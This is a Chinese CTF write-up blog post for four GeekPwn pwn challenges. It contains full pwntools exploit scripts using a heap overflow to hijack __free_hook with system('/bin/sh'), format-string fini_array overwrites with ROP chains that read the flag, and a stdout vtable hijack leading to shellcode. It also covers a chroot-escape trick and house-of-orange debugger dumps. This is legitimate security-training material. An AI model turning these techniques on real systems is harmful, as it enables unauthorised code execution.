GeekPwn云靶场挑战赛部分题解

2020-07-15

记录下比赛当时解出来的和后来复现的题目，队内web师傅太顶了！！！

babypwn

read_n函数输入的size为0时可以溢出
show函数没有检查idx，可以用来泄露libc地址
用堆溢出先在main_arena里构造出合法的size，在分配到main_arena上，修改top_chunk，在用堆溢出劫持__free_hook

from pwn import *
import sys

context.arch = 'amd64'

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))

def cmd(command):
	p.recvuntil(":")
	p.sendline(str(command))

def add(name,sz,content):
	cmd(1)
	p.recvuntil(":")
	p.send(str(name))
	p.recvuntil(":")
	p.sendline(str(sz))
	p.recvuntil(":")
	p.send(content)

def dele(idx):
	cmd(2)
	p.recvuntil(":")
	p.sendline(str(idx))

def show(idx):
	cmd(3)
	p.recvuntil(":")
	p.sendline(str(idx))

def main(host,port=14823):
	global p
	if host:
		p = remote(host,port)
	else:
		p = process("./pwn")
		# debug(0x000000000000DEE)
		gdb.attach(p)	
	show(-5)
	p.recvuntil('name:')
	libc.address = u64(p.recv(6).ljust(8,'\x00')) - 0x3c5710
	info("libc : " + hex(libc.address))
	add("oooo\n",0x10,"oooo\n")	#0
	add("oooo\n",0x30,"oooo\n")
	dele(0)
	dele(1)
	add("oooo\n",0,p64(0)*3+p64(0x41)+p64(0x51)+'\n')
	add("oooo\n",0x30,"oooo\n")	#1
	add("oooo\n",0x10,"oooo\n")	#2
	add("oooo\n",0x40,"oooo\n")	#3
	dele(2)
	dele(3)
	add("oooo\n",0,p64(0)*3+p64(0x51)+p64(libc.address+0x3c4b30)+'\n')	#2
	add("oooo\n",0x40,"oooo\n") #3
	add("oooo\n",0x40,"\x00"*0x38+p64(libc.address+0x3c5c50)[:6]+'\n') # 4
	add("oooo\n",0,"/bin/sh\x00"*3+p64(0xffffffffffff)+"\x00"*0xb28+p64(libc.symbols["system"])+'\n')
	dele(5)
	p.interactive()
	
if __name__ == "__main__":
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	# elf = ELF("./bf",checksec=False)
	main(args['REMOTE'])

ezshell

格式化字符串，劫持fini_array

原先用这两个gadget本地打通了：

1 2	0x0000000000424a4a # xchg eax,ebp; ret 0x000000000400C06

但是由于要一次性发送0x2000字节的数据，好像远程不会一次性接受这么长的数据

后面换了个思路，用：

1	# 0x0000000000419845: mov rdi, rbp; call qword ptr [rbp + 0x20] ## 0x6ed0c0+0x20

然后在rbp+0x20处写入0x400bd6，跳转到0x400bd6成功劫持程序，最后打开flag的fd是5

打通了，脚本就没改了，生怕哪里又出错，好像也没必要泄露

from pwn import *
import sys

context.arch = 'amd64'

def main(host,port=11397):
	global p
	if host:
		p = remote(host,port)
	else:
		p = process("./pwn")
		# gdb.attach(p,"b *0x40ac50\nc")
		gdb.attach(p,"b *0x000000000400DDE\nc")
	p.recvuntil("back.")
	addr1 = 0x0000000000424a4a	# xchg eax,ebp; ret
	addr2 = 0x000000000400C06
	# 0x0000000000419845: mov rdi, rbp; call qword ptr [rbp + 0x20]			## 0x6ed0c0+0x20
	# 0x0000000000422924: xchg edi, esp; add al, 0; add dh, dh; ret;
	func = 0x400bd6
	addr3 = 0x0000000000419845
	addr4 = 0x0000000000422924
	payload = "%38$p_%33$p%{}c%{}$hhn_%{}$hhn_%{}$hhn".format(0x40-33,18,19,20)
	payload += "%{}c%{}$hn%{}c%{}$hn%{}c%{}$hn".format((func&0xffff)-0x42,21,(addr4&0xffff)-(func&0xffff),22,(addr3&0xffff)-(addr4&0xffff),23)
	payload += "_"*5+p64(0x6ed0e2)+p64(0x6d6832)+p64(0x6d682a)+p64(0x6ed0e0)+p64(0x6d6828)+p64(0x6d6830)
	p.sendline(payload)
	p.recvuntil("message:")
	stack = int(p.recvuntil("_")[:-1],16)
	canary = int(p.recv(18),16)
	info("stack : " + hex(stack))
	info("canary: " + hex(canary))
	p.recvuntil("_____")
	p.recvuntil("n")
	# 0x0000000000482286: pop rax; pop rdx; pop rbx; ret;
	# 0x0000000000471115: syscall; ret;
	# 0x000000000040b74a: pop rdi; pop rbp; ret;
	# 0x00000000004014a4: pop rsi; ret;
	p_rax_pp = 0x0000000000482286
	syscall = 0x0000000000471115
	p_rdi_p = 0x000000000040b74a
	p_rsi = 0x00000000004014a4
	
	rop_chain = [
		p_rdi_p,0,0,p_rsi,0x6ed118,p_rax_pp,0,0x200,0,syscall,
	]
	payload = "flag".ljust(8,"\x00")+flat(rop_chain)+'\n'
	p.send(payload)
	pause()
	# to show flag's fd
	# 0x000000000047abc6: mov qword ptr [rdi + 0x308], rax; ret;
	# rop_chain = [
		# p_rsi,0,p_rdi_p,0x6ed0c0,0,p_rax_pp,2,0,0,syscall,
		# p_rdi_p,0x6ef000,0,0x047abc6,
		# p_rdi_p,1,0,p_rsi,0x6ef000+0x308,p_rax_pp,1,0x20,0,syscall
	# ]
	rop_chain = [
		p_rsi,0,p_rdi_p,0x6ed0c0,0,p_rax_pp,2,0,0,syscall,
		p_rdi_p,5,0,p_rsi,0x6ef000,p_rax_pp,0,0x100,0,syscall,
		p_rdi_p,1,0,p_rax_pp,1,0x100,0,syscall
	]
	p.send(flat(rop_chain)+'\n')
	p.interactive()
	
if __name__ == "__main__":
	# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	# elf = ELF("./pwn",checksec=False)
	main(args['REMOTE'])

childshell

这题和ezshell很像，但是程序在main函数返回后会马上调用_exit，这个函数直接就用syscall来退出，所以改思路为劫持stdout的vtable来劫持程序流程，劫持了程序流程之后，我们可以成功执行shellcode，但是程序被chroot了：

v10 = _opendir("./sandbox");
  if ( !v10 )
  {
    v3 = (char *)0x16D;
    _mkdir("./sandbox", 0x16DLL);
  }
  if ( (unsigned int)chroot() == -1 )
    perror((__int64)"error.", (__int64)v3, v4);
  if ( (unsigned int)_chdir() == -1 )
    perror((__int64)"error.", (__int64)v3, v5);
  if ( (unsigned int)_setuid(0xFFFEu) == -1 )
    perror((__int64)"error.", (__int64)v3, v6);

比赛的时候死活逃不出去，看了下wp，好像mkdir(".42"),chroot(".42"),chroot("../../../../../../")这样就逃出去了，也不知道为啥，想起上次也是这样，直接chdir("../../../../../../../")就逃出去了，本地是不行的，打远程却是可以

这个exp就到能执行shellcode这一步，后面的看Nu1L大佬们的wp把：

from pwn import *
import sys

context.arch = 'amd64'

def main(host,port=17381):
	global p
	if host:
		p = remote(host,port)
	else:
		p = process("./pwn")
		# gdb.attach(p,"b *0x40ac50\nc")
		# gdb.attach(p,"b *0x000000000400D56\nc")
	p.recvuntil("back.")
	# 0x0000000000410895: mov rdi, rbp; call qword ptr [rbp + 0x20];  ### rbp = 0x6cb0a0
	stdout_vtable = 0x6CB300+0xd8	
	fake_vtable = 0x703500+0x38
	fini_array = 0x0000000006CAEE8+8
	func = 0x0000000004009B6
	addr = 0x0000000000410895
	exit = 0x401066
	# 0x455573
	payload = "%{}c%{}$hhn%{}$hhn_%{}$hhn".format(0x40,18,19,20)
	payload += "%{}c%{}$hn%{}c%{}$hn%{}c%{}$hn%{}c%{}$hhn".format((addr&0xffff)-0x41,21,(func&0xffff)-(addr&0xffff),22,(exit&0xffff)-(func&0xffff),23,0xa,24)
	payload += "%c"*4+p64(fake_vtable+2)+p64(0x6cb0a0+0x22)+p64(fini_array+2)+p64(fini_array)+p64(0x6cb0a0+0x20)+p64(fake_vtable)+p64(stdout_vtable+2)
	pause()
	p.sendline(payload)
	p.recvuntil("message:")
	
	# 0x0000000000479976: pop rax; pop rdx; pop rbx; ret;
	# 0x0000000000468bf5: syscall; ret;
	# 0x0000000000401a36: pop rdi; ret;
	# 0x0000000000401b57: pop rsi; ret;
	# 0x0000000000443f96: pop rdx; ret;
	# 0x00000000004722b6: mov qword ptr [rdi + 0x308], rax; ret;
	# 0x00000000004a4a1f: jmp rdi;
	p_rax_pp = 0x0000000000479976
	syscall = 0x0000000000468bf5
	p_rdi = 0x0000000000401a36
	p_rsi = 0x0000000000401b57
	p_rdx = 0x0000000000443f96
	jmp_rdi = 0x00000000004a4a1f
	rop_chain = [
		p_rdi,0x700000,p_rsi,0x1000,p_rdx,7,0x0000000004415E0,
		p_rdi,0,p_rsi,0x700000,p_rax_pp,0,0x200,0,syscall,
		p_rdi,0x700000,jmp_rdi
	]
	# payload = "flag".ljust(8,"\x00")+flat(rop_chain)+'\n'
	payload = p64(0) + flat(rop_chain)
	p.sendline(payload)

	sc = """
		nop;
		nop;
	"""
	pause()
	p.send(asm(sc))
	# pause()		
	# rop_chain = [
		# p_rsi,0,p_rdi_p,0x6ed0c0,0,p_rax_pp,2,0,0,syscall,
		# p_rdi_p,0x6ef000,0,0x047abc6,
		# p_rdi_p,1,0,p_rsi,0x6ef000+0x308,p_rax_pp,1,0x20,0,syscall
	# ]
	# rop_chain = [
	# 	p_rsi,0,p_rdi_p,0x6ed0c0,0,p_rax_pp,2,0,0,syscall,
	# 	p_rdi_p,5,0,p_rsi,0x6ef000,p_rax_pp,0,0x100,0,syscall,
	# 	p_rdi_p,1,0,p_rax_pp,1,0x100,0,syscall
	# ]
	# p.send(flat(rop_chain)+'\n')
	p.interactive()
	
if __name__ == "__main__":
	# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	# elf = ELF("./pwn",checksec=False)
	main(args['REMOTE'])

paperprinter

这题很像2019年*ctf的heapmaster，但是又有点不一样，我们只有一次malloc的机会，还有一次就是选项4的strdup也会调用malloc，但是调用完之后就退出了，应该是拿来最后劫持程序流程的，比赛的时候没啥思路，赛后看了chamd5团队的wp，我去，太牛逼了

用的house of orange的思路，程序一开始会给sleep函数的后面几个字节：

1	printf("0x%lx\n", ((unsigned __int64)&sleep & 0xFFF00) >> 8);

这样后面爆破的几率提高到了1/16，wp里的思路是一开始free两个0x90和一个0x140大小的堆块，然后用那仅有的一次malloc机会把0x140大小的堆块malloc掉，这样前面两个0x90的堆块就会被置入smallbin，堆块的bk指针就会是libc的地址，接着在释放一个堆块进入到unsortedbin，修改其bk指针指向__IO_list_all，最后用strdup来触发，在触发的时候的堆布局：

LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────
 RAX  0x490170e0 ◂— 0x0
 RBX  0x49017000 ◂— 0x68732f6e69622f /* '/bin/sh' */
 RCX  0x7fc3a9d4e740 ◂— cmp    rax, -0x1000 /* 'H=' */
 RDX  0x0
 RDI  0x49017000 ◂— 0x68732f6e69622f /* '/bin/sh' */
 RSI  0xffffffff
 R8   0x4
 R9   0x0
 R10  0x8
 R11  0x246
 R12  0x7fc3aa2ea700 ◂— 0x7fc3aa2ea700
 R13  0x0
 R14  0x0
 R15  0x0
 RBP  0x0
 RSP  0x7fffa6196d40 ◂— 0x756e672d78756e69 ('inux-gnu')
 RIP  0x7fc3a9d951a3 ◂— call   qword ptr [rax + 0x18]
─────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
   0x7fc3a9d95294    cmp    qword ptr [rbx + 0x28], rax
   0x7fc3a9d95298    ja     0x7fc3a9d95194
    ↓
   0x7fc3a9d95194    mov    rax, qword ptr [rbx + 0xd8]
   0x7fc3a9d9519b    mov    esi, 0xffffffff
   0x7fc3a9d951a0    mov    rdi, rbx
 ► 0x7fc3a9d951a3    call   qword ptr [rax + 0x18]

其中：

pwndbg> telescope 0x49017000 30
00:0000│ rbx rdi  0x49017000 ◂— 0x68732f6e69622f /* '/bin/sh' */
01:0008│          0x49017008 ◂— 0x61 /* 'a' */
02:0010│          0x49017010 —▸ 0x7fc3aa0ddbc8 —▸ 0x7fc3aa0ddbb8 —▸ 0x7fc3aa0ddba8 —▸ 0x7fc3aa0ddb98 ◂— ...
... ↓
04:0020│          0x49017020 ◂— 0x2
05:0028│          0x49017028 ◂— 0x3
06:0030│          0x49017030 ◂— 0x0
... ↓
12:0090│          0x49017090 ◂— 0x90
13:0098│          0x49017098 ◂— 0x20 /* ' ' */
14:00a0│          0x490170a0 ◂— 0x0
15:00a8│          0x490170a8 ◂— 0x21 /* '!' */
16:00b0│          0x490170b0 ◂— 0x0
17:00b8│          0x490170b8 ◂— 0x21 /* '!' */
18:00c0│          0x490170c0 ◂— 0x0
19:00c8│          0x490170c8 ◂— 0x91
1a:00d0│          0x490170d0 —▸ 0x7fc3aa0ddbf8 —▸ 0x7fc3aa0ddbe8 —▸ 0x7fc3aa0ddbd8 —▸ 0x49017000 ◂— ...
1b:00d8│          0x490170d8 —▸ 0x490170e0 ◂— 0x0
1c:00e0│ rax      0x490170e0 ◂— 0x0
1d:00e8│          0x490170e8 ◂— 0x91
pwndbg> telescope 0x490170e0
00:0000│ rax  0x490170e0 ◂— 0x0
01:0008│      0x490170e8 ◂— 0x91
02:0010│      0x490170f0 —▸ 0x490170c0 ◂— 0x0
03:0018│      0x490170f8 ◂— 0x7fc3aad5e3a0 ◂— test   rdi, rdi
04:0020│      0x49017100 ◂— 0x0

其中rbx指向的就是我们伪造的io结构，其0xd8的偏移，巧妙的利用了smallbin的bk指针，使其指向0x490170e0，而0x490170e0+0x18的位置又是刚刚好另一个chunk的bk指针，用部分写改为了system，太牛逼了

exp还是看chamd5大佬的wp把

参考链接：

chamd5_Geekpwn云靶场挑战赛wp

Nu1L_Geekpwn云靶场挑战赛wp